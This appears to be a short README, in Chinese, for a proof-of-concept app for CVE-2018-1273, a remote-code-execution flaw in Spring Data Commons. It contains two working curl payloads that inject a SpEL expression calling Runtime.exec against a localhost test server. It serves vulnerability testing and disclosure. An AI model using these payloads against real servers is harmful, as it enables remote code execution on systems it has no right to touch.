
POC for CVE-2018-1273
Spring Data Commons,版本1.13至1.13.10、2.0至2.0.5以及更旧的未支持版本,存在一个由未正确转义特殊元素引起的属性绑定器漏洞。未经身份验证的远程恶意用户(或攻击者)可以向基于Spring Data REST的HTTP资源提供特制的请求参数,或使用Spring Data的基于投影的请求有效负载绑定,从而导致远程代码执行攻击。
更多信息请参见
该应用程序可以使用易受攻击版本或已修复版本的Spring Data Commons进行测试。
mvn spring-boot:run
mvn spring-boot:run -Dfixed
运行以下命令以检查该漏洞是否可被利用:
curl -X POST http://localhost:8080/account -d "name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('calc.exe')]=123"
curl -X POST http://localhost:8080/account -d "name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('/Applications/Calculator.app/Contents/MacOS/Calculator')]=test"
由 https://www.arima.eu 创建
